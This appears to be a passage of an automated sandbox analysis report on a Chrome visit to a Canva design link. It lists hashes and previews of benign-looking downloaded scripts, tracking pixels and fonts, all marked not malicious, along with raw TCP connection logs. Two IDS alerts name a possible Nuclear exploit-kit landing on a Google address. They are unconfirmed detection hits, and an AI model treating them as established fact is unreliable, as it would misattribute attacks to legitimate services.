                                                                                                                                                                                                                                                    Size (bytes):4414
                                                                                                                                                                                                                                                    Entropy (8bit):5.9195472440471955
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:v6LQztmnE2hqFJmd7l0TlPInbSqVpWV9gr9Fb3+:bs4oCTlGbSqVpWXw9p
                                                                                                                                                                                                                                                    MD5:A0C86DA7FC37EA50E848C4733761D53E
                                                                                                                                                                                                                                                    SHA1:7B53A4FE8198AA654C02282134DCC19E0C07CC9A
                                                                                                                                                                                                                                                    SHA-256:EC2FBAD47E598FE06C7A2B825224B3B1B8D8221F3002E6370E627D459FF0634A
                                                                                                                                                                                                                                                    SHA-512:6FD3BB6D1392F89DCF63A37A9086517620A63C6D933885ACDB61F99BB8AF137D2DD184C59EF92C173E214711DCEAE9585A5B574AFB422A4A0969D99C86264339
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:...... .... .(.......(... ...@..... ......................................................@...........#h..!g\."h..!i..#k..$l..$n..$o..%q..%r..'s[.#t..........@...................................................UU..........,]).+_..)b..*j..)l..'l..%l..$k..#m..$q..&u..(y..(z..&t..&u..%v)..........U......................................@@..........3Y..1[..4b..1]..0\..0^../`..,c..+f..)i..&l..%o..%q..&s..&t..)|..'v..(v..........@...............................33......8X .7V..;]..7V..8W..7W..7X..8Z..=_..?b..?e..<g..5g..-i..*m..(q..&s..&t..'u..*...(x..(x .....3f......................@@......CN..?R..@W..=R..=R..>S..?S..GZ..<S...?...5...6...@..!T..?f..;i..0j..-o..)s..'u..'w..*}..(y..'z......@...............UU......PP .HL..IO..EN..DO..CN..GQ..GQ...!..HR................ly...B...O..Dh..7g..3l...q..)v..(w..)|..)z..(x ......U..................SG..UK..PG..NI..LI..NN..FF..76..................................|....>..He..=e..8i..3o..-t..*w..+...){..............@......\A..cG..ZB..XC..VD..VG..QC..OA...
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2415)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):22394
                                                                                                                                                                                                                                                    Entropy (8bit):5.43398653378245
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:/nJ+fGMjzTE2KzVBDq4eB8+dLzgTKb5IxrzhNQDvkH8zdo8SGerbsKl5NdrNgSm9:/cfGMXA2I24eBH1HI5lNQTkAdo8SGerS
                                                                                                                                                                                                                                                    MD5:495C0AC6BD7BAC84D05D17CF85ABE15D
                                                                                                                                                                                                                                                    SHA1:A41D664EC4338CDB3BFBE46899772DDDEA3E9D80
                                                                                                                                                                                                                                                    SHA-256:AA5813304552E248B262F4152B3B7693D7EA48FF5A29C0BEDBEFD6338357D847
                                                                                                                                                                                                                                                    SHA-512:4A483AB8A04939944D6132ABF217B94B70BBFE026215DC16C8F4AB94E9E4CE6B18315D7DA299BB1D14CE268E72920373F695E77A3EA83C52FF53EC27D52DDB02
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/32526717065b2b04.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3349],{../***/ 577033:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var cy;var A=__c.A;var YY;var B=__c.B;var Ga=__c.Ga;var r8a,OY,PY,s8a,u8a,SY,x8a,w8a,y8a,z8a,A8a,TY,B8a,VY,D8a,G8a,H8a,J8a,K8a,ZY,O8a,P8a,M8a,aZ,L8a,F8a,N8a,E8a;__c.NY=function(a,b){return __c.aa[a]=b};r8a=function(a){return a instanceof Error?"QuotaExceededError"===a.name||a instanceof DOMException&&22===a.code||a instanceof q8a:!1};OY=function(a){const b=Error(a);return c=>{c instanceof Error&&(null==c.stack||""===c.stack)&&(c.stack=b.stack);return c}};.PY=function(a){return new Promise((b,c)=>{const d=()=>{a.removeEventListener("success",e);a.removeEventListener("error",g)},e=()=>{d();b(a.result)},f=OY("idb promisify_request_events error")
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):317784
                                                                                                                                                                                                                                                    Entropy (8bit):5.584539483392537
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:n44WYnsmQ88MZ1HcRCrKkEZMf3/mrfH6uT+bsDX:44Sm98M7Hc82UQX
                                                                                                                                                                                                                                                    MD5:5EFBFB9707CE1256826AF95AEE8FCF72
                                                                                                                                                                                                                                                    SHA1:B273EA14A673410F03CB45EC529715FF1081A2A7
                                                                                                                                                                                                                                                    SHA-256:57590D455DECE86BD31F15B5444ADDEFEF908EB72F03EFEC7575F0698FE06A12
                                                                                                                                                                                                                                                    SHA-512:F9BCFF8CC49B98FB1813C966099EB074EAB835248CCE2DF73E8E5636C2757CDA52493F9679B8BC8806AC83ED7141490BCC553409589C9442D871DD872DEE4D5A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-EPWEMH6717&l=dataLayer&cx=c&gtm=45He4cc1v812729902za200
                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":12,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_manualEmailEnabled":false,"vtp_cityValue":"","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneValue":"","vtp_autoPhoneEnabled":false,"vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":107},{"function":"__ccd_ga_first","priority":11,"vtp_instanceDestinationId":"G-EPWEMH6717","tag_id":120},{"function":"__set_product_settings"
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):35234
                                                                                                                                                                                                                                                    Entropy (8bit):5.118117952047096
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:w2WKaz3wcJtHbfbR1w+1+0p/8Oq/lU+I47M0an2B8eQLb80+S9tUg7M5NOJ1/iV6:q
                                                                                                                                                                                                                                                    MD5:E09E2E1FC340201F46C6B422BA600D5A
                                                                                                                                                                                                                                                    SHA1:16D401D9A12AD80829C81CD561D51EB392D402E1
                                                                                                                                                                                                                                                    SHA-256:4C0EFBD2527DC14E6F890750AFE5C802AC496AB5F74B681D262975A0035790CF
                                                                                                                                                                                                                                                    SHA-512:F3D7ED9695D32759B396321DBC382EC0D9864B884FFCE9BDD22CC2DACB29284524EE882A748619AE399CFBB6616621A888879F5540A6DF465C8F18B6D34841F5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/_fb/s/41d36c36b634199c0ebf5e807fda38d0.css
                                                                                                                                                                                                                                                    Preview:@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/05.woff) format("woff"), url(https://font-public.canva.com/_fb/0/05.ttf) format("truetype")}..@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 700; font-style: normal; src: url(https://font-public.canva.com/_fb/0/02.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/02.woff) format("woff"), url(https://font-public.canva.com/_fb/0/02.ttf) format("truetype")}..@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: italic; src: url(https://font-public.canva.com/_fb/0/04.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/04.woff) format("woff"), url(https://font-public.canva.com/_fb/0/04.ttf) format("truetype")}
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://adservice.google.com/ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a
                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6739)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):7061
                                                                                                                                                                                                                                                    Entropy (8bit):5.15754941607153
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:bI9hhT9vVVxHdR8JLXsgtcchFWHf9l5Hk9vIv8PTw:bwhXvzxHIXsJcC/vlevI+s
                                                                                                                                                                                                                                                    MD5:7D0DBD3E6B5398F851084B652D4490B1
                                                                                                                                                                                                                                                    SHA1:EEE3CB406BA40C91E004125A1E51D122F1D01805
                                                                                                                                                                                                                                                    SHA-256:CCF9C1674CA9DFF09526A7C6D82AB220028FA011EBFD9132859491C4C7556D4E
                                                                                                                                                                                                                                                    SHA-512:120722EA8FE03782A1610F4FC0402498E2BA44EB19C5592AD85B9866D89712FFED8F2E25A83D6C6E70AD81BABFD715E2B510D64D5BE7505862491BA831A79E27
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/579a47f0411a508b.strings.js
                                                                                                                                                                                                                                                    Preview:(function() {. const messages = JSON.parse("{\"in7gzw\":\".{0} . {1}\",\"TNekNA\":\"Engineering\",\"yTCqEQ\":\"Absolute value. Removes minus signs from negative numbers.\",\"YAYu0Q\":\"Returns TRUE if any argument is TRUE.\",\"LE4MeQ\":\"Esc\",\"R+x2Sw\":\"return-column\",\"M50kBA\":\"Previous\",\"8MC7NQ\":\"Counts the cells with any data.\",\"ETcy/w\":\"Video not found\",\"yLWiZA\":\"Ctrl\",\"pjl2iw\":\"Sorry, we couldn.t load this chart.\",\"MzOrJg\":\"year\",\"ZmfiBA\":\"...texts\",\"MvkKiw\":\"Finds the largest value.\",\"trinwg\":\"Previous\",\"W5NwSg\":\"Zoom out\",\"xWzt7A\":\"Show captions\",\"7JFBKQ\":\"date\",\"C0VHsg\":\"The formula contains an invalid number\",\"XoXDGA\":\"Try again.\",\"27G5yg\":\"Pause\",\"VdIrCw\":\"Rounds the number to the specified number of decimal places.\",\"9ND0kg\":\"The formula refers to a cell that.s not valid\",\"hMw7aQ\":\"Counts the number of empty cells in a specified range.\",\"ibdecg\":\"Numbers can.t be divided by zero\",\"P2CRh
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6785
                                                                                                                                                                                                                                                    Entropy (8bit):4.764532758184024
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:4rPKbcyONPj2Ix4JA63seKKpJ4zde/rsVJgqecW2RYz2nS6ef/kqy:4rPSchJ2Y4JhserpGZEVqecW2RRS6e0b
                                                                                                                                                                                                                                                    MD5:9C747CF07B2623FE6F77E47F5A134103
                                                                                                                                                                                                                                                    SHA1:7180E5B53413163E10A6CA1E94518AC2CEB7970A
                                                                                                                                                                                                                                                    SHA-256:476CDA2BDE7910A58186B7B58D2BE6D22D3CFACDFEDA3354134B84E43D76AC98
                                                                                                                                                                                                                                                    SHA-512:4C1894FD984FC35FBC725737F68B69982B4E53864EB8BF1B8A5826D4D62C682AD4D50C08BA4EAEE3FBE04D3B91EA22A79559AA77BE6BCF3B81025348C8CEB35A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(function () {. /**. * @type {string} Key for the visitor ID cookie.. */. const visitorIdKey = "Metadata_visitor_id";.. /**. * @type {string} Key for the session ID cookie.. */. const sessionIdKey = "Metadata_session_id";.. /**. * @type {string} IP address of the client.. */. let ip;.. /**. * Account configuration object.. */. const config = {. invalid: true. };.. /**. * Options object.. */. const opts = {. /**. * @type {string} Base URL for the CDN.. */. cdnBaseUrl: "https://cdn.metadata.io/pixel/config",.. /**. * @type {string} Base URL for the API.. */. baseUrl: "https://api-gw.metadata.io",.. /**. * @type {string} Account ID.. */. accountId: null. };.. /**. * Get the value of a cookie.. * @param {string} key - The key of the cookie.. * @returns {string|null} The value of the cookie, or null if not found.. */. const getCookieValue = (key) => {. const cookie = document.cookie.split("; ").find(fu
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1207)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):2941
                                                                                                                                                                                                                                                    Entropy (8bit):5.703694992734448
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:AOAa0nkOEJw0l+zYwvvYFDCwszjSBzXwoKSTwaJtar97mhsX2HfwD+JnWj0TZ8zE:8nJEJwJzvXYFDZszuBzAoKSp20JnWjSt
                                                                                                                                                                                                                                                    MD5:F1580512DE3AC255D76178FC682B9F0C
                                                                                                                                                                                                                                                    SHA1:24B8D0CEFCE6DE4476FA293B9637817E06720745
                                                                                                                                                                                                                                                    SHA-256:0ABB359B05E1F63DA9B876D5B7284F7BE9055C400032847DDE1E142990FCCEBA
                                                                                                                                                                                                                                                    SHA-512:159CF6F40FD1E302E03ABA64B08E9F709A59A49FD094A66737F59B9F1A2FF579E9D0AC39B325A4ADEEE2D0161A7C8D90D6ECEE917D0E638F038D88603F984CBD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/f919d823e68691c3.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1302],{../***/ 153325:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var JY;var d8a,e8a,h8a,i8a,GY;__c.f8a=function(a){a=d8a(a);return e8a(a)};d8a=function(a){return Object.entries(a).reduce((b,[c,d])=>{"name"!==c&&null!=d&&(c=c.replace(/[-.]/g,"_"),b[c]=d);return b},{})};e8a=function(a){return Object.entries(a).reduce((b,[c,d])=>{if("name"!==c&&null!=d){const f=typeof d;var e=g8a.has(c)&&g8a.get(c)!==f;b[`${c}${e?`_${f}`:""}`]=d}return b},{})};.h8a=function(a){return(b,c,d,e)=>{d/=e;return 0===d?b:1===d?c:b+(c-b)*-Math.pow(2,1/a.amplitude*(d-1)*10)*Math.sin(5*(d-1.1)*Math.PI)}};i8a=function(a){return(b,c,d,e)=>{d/=e;e=c-b;return 0===d?b:1===d||0===e?c:b+e*(Math.pow(2,1/a.amplitude*d*-10)*Math.sin(5*(d-.1)*Mat
                                                                                                                                                                                                                                                    No static file info
                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-12-19T22:27:45.893359+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.449841172.217.19.228443TCP
                                                                                                                                                                                                                                                    2024-12-19T22:27:48.518418+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.449848172.217.19.228443TCP
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:12.519779921 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.834626913 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.834693909 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.834758997 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.834960938 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.834971905 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.537657022 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.537936926 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.537982941 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.539016962 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.539084911 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.540173054 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.540244102 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.582612991 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.582660913 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.629498959 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.954827070 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.954881907 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.955068111 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.955629110 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.955682039 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.955735922 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.955892086 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.955908060 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.956073999 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.956088066 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.313616037 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.313864946 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.313893080 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.314786911 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.314858913 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.320529938 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.324292898 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.324366093 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.324475050 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.324489117 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.324989080 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.325010061 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.326164007 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.326231003 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.327482939 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.327586889 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.368571997 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.381958008 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.381974936 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.426821947 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.865159988 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.865196943 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.865245104 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.865281105 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.865664005 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.865709066 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.865720034 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.873394012 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.873437881 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.873456955 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.885073900 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.885117054 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.885143042 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.885163069 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.885210991 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.893471003 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.934715033 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.934746981 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.975271940 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:19.984798908 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.038692951 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059029102 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059076071 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059145927 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059488058 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059542894 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059598923 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059837103 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059926033 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.059966087 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060012102 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060134888 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060144901 CET44349746104.16.102.112192.168.2.4
